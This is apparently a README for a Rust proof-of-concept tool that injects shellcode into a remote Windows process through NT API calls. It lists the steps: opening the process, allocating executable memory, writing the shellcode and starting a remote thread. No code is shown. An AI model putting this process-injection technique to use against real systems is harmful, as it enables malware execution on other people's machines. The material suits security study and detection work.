Shellcode_Exectuion_NtApi

Shellcode Execution via Remote Process using NtAPI

Overview

This Rust program demonstrates shellcode execution in a remote process using Windows NT API calls:

• NtAllocateVirtualMemory
• NtWriteVirtualMemory
• NtCreateThreadEx

Download NtMapViewOfSection PoC: Download

How this program works ?

1. Setup:

   • Accepts a target PID as a command-line argument
   • Contains a shellcode array (328 bytes, partially shown)

2. Process Access:

   • Opens the target process with PROCESS_ALL_ACCESS rights using OpenProcess
   • Loads ntdll.dll dynamically

3. Memory Allocation:

   • Uses NtAllocateVirtualMemory to allocate memory in the target process
   • Sets PAGE_EXECUTE_READWRITE (0x40) protection
   • Uses MEM_COMMIT | MEM_RESERVE (0x3000) allocation type

4. Shellcode Injection:

   • Writes the shellcode to the allocated memory using NtWriteVirtualMemory

5. Execution:

   • Creates a new thread in the target process using NtCreateThreadEx
   • Sets the thread start address to the allocated memory containing shellcode
   • Uses maximum access rights (0x2000000) for thread creation

6. Cleanup:

   • Closes process and thread handles

Functionality

1. Allocates memory in the target process
2. Writes shellcode to the allocated memory
3. Creates a thread to execute the shellcode

Requirements

• rustc 1.85.1 (4eb161250 2025-03-15)
• Rust toolchain (stable-x86_64-pc-windows-msvc (default))
• Target process PID

Usage

cargo run --release <target_pid>

Credits / Resources

• @5mukx